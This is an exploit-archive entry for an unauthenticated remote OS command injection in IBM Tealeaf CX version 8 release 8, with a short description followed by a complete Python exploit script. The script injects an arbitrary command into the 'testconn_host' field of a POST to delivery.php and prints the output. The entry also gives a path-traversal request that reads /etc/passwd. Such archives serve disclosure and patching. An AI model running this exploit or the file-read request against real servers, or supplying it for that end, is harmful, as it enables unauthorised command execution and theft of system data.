IBM Tealeaf CX (v8 release 8) Remote OS Command Injection

vendor:

Tealeaf CX

by:

drone

7,5

CVSS

HIGH

Remote OS Command Injection

78, 94

CWE

Product Name: Tealeaf CX

Affected Version From: Version 8 Release 8

Affected Version To: Version 8 Release 8

Patch Exists: YES

Related CWE: CVE-2013-6719, CVE-2013-6720

CPE: a:ibm:tealeaf_cx:8.8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Redhat Linux 6.2

2013

IBM Tealeaf CX (v8 release 8) Remote OS Command Injection

This exploit allows an attacker to execute arbitrary OS commands on IBM Tealeaf CX (v8 release 8) without authentication. The exploit is triggered by sending a specially crafted POST request to the delivery.php page. The POST request contains a parameter called 'testconn_host' which is used to execute the arbitrary OS command. The exploit also allows an attacker to access the /download.php?log=../../etc/passwd page, which can be used to gain access to the system's password file.

Mitigation:

IBM has released a patch to address this vulnerability. Users should upgrade to the latest version of IBM Tealeaf CX (v8 release 8).

Source

Exploit-DB raw data:

# IBM Tealeaf CX (v8 release 8) Remote OS Command Injection
# Date: 11/08/2013
# Exploit author: drone
# More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630 
# Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/
# Version: Version 8 Release 8 (likely all versions prior)
# Tested on: Redhat Linux 6.2
# CVE: CVE-2013-6719 / CVE-2013-6720

import requests
from argparse import ArgumentParser

""" Remote OS command injection (no auth)
    IBM TeaLeaf Version 8 Release 8
    drone (@dronesec)

    Bonus:
    LFI at /download.php?log=../../etc/passwd
"""


def run(options):
    access = "http://{0}:{1}/delivery.php".format(options.address, options.port)
    data = {"perform_action" : "testconn",
            "delete_id" : "",
            "testconn_host" : "8.8.8.8 -c 1 ; {0} ; ping 8.8.8.8 -c 1".format(options.cmd),
            "testconn_port" : 1966,
            "testconn_t"    : "false",
            "csrf" : "afe2fce60e94a235511a7397ec5c9a87fb7fc25b", # it doesnt even care
            "delivery_mode" : 0,
            "batch_interval" : 60,
            "polling_interval" : 10,
            "watchdog_timer" : 30,
            "max_queue_depth" : 50000000,
            "timesource_host" : "test",
            "timesource_port" : 1966,
            "staticshit_enabled" : "on", # seriously
            "staticshit_host" : "test",
            "staticshit_intervalseconds" : 60,
            "staticshit_port" : 1966
           }

    response = requests.post(access, data=data, timeout=20.0)
    if response.status_code == 200:
        # lazy parsing
        result = response.content.split("alert('")[1].split('onUnload')[0]
        for x in result.split("\\n"):
            if 'PATTERN' in x: break
            print x
            
    
def parse_args():
    parser = ArgumentParser()
    parser.add_argument("-i", help="Server address", action="store",
                        required=True, dest="address")
    parser.add_argument("-p", help='Server port', action='store',
                        dest='port', default=8080)
    parser.add_argument("-c", help='Command to exec', action='store',
                        dest='cmd', default='whoami')
    return parser.parse_args()

if __name__ == "__main__":
    run(parse_args())